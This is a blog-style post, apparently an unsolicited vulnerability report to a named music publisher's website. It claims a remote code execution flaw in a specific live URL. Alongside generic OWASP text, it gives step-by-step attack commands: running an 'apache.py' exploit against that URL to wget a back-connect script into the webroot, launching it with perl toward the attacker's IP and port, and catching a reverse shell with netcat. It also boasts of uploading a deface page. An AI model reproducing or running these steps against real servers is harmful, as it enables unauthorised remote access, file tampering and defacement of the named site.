Hi halleonard,
Here is Shaifullah Shaon (Black_EyE), An Ethical Hacker.
a white hat cyber security researcher from Bangladesh reporting a serious
[3’rd ranking in OWASP] security vulnerability on your system. 
I faced a technical security bug called RCE (Remote Code Execution).
That time I saw you “Data Privacy Statement” and got that your data is very confidential und
important  for your organization. That’s why I am reporting for these web security vulnerability
for protecting your information’s from malicious user’s/ attackers/ hackers. Please patch these
security issues as early as possible.
RCE means= Remote Code Execution.

Description of the Vulnerability:
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:

    allowed characters (standard regular expressions classes or custom)
    data format
    amount of expected data

Code Injection differs from Command Injection in that an attacker is only
limited by the functionality of the injected language itself. If an attacker
is able to inject PHP code into an application and have it executed,
he is only limited by what PHP is capable of. Command injection consists of
leveraging existing code to execute commands, usually within the context of a shell.

Reference:
https://www.owasp.org/index.php/Code_Injection
www-01.ibm.com/support/docview.wss?uid=swg21970361
https://securityintelligence.com/remote-code-execution-in-xiaomi-miui-analytics/

Vuln Point: https://www.halleonard.com/product/viewproduct.action

Here I am using a python script for helping my making videos.

Let’s follow me,
I will show u step by step:
1. open exploit using cmd like command apache.py
2. write apache.py url commandline
3. apache.py https://www.halleonard.com/product/viewproduct.action “cd /hlo/webapps/ROOT/;wget backconnect script here.txt”
4. apache.py https://www.halleonard.com/product/viewproduct.action “cd /hlo/webapps/ROOT/;perl bc.txt myip port”
5. NOw I open Netcat using my Cmd terminal like command nc -lnvp port.
Yahoo! Successfully Backconnected to your server. Now I can Download, Upload or edit, delete get file etc as my wish.
6. Here you already seen that, I upload my deface page successfully.

This is Very harmful and also critical issue.
Resolve this issue as soon as possible.
Here is proof as video concept:

Thank you
Shaifullah Shaon (Black_EyE)
shaon.durjoy@gmail.com
+8801931397872

It’s an Online It Section
Please Subscribe us.




Leave a Reply

Your email address will not be published. Required fields are marked *

Name *
Email *
Website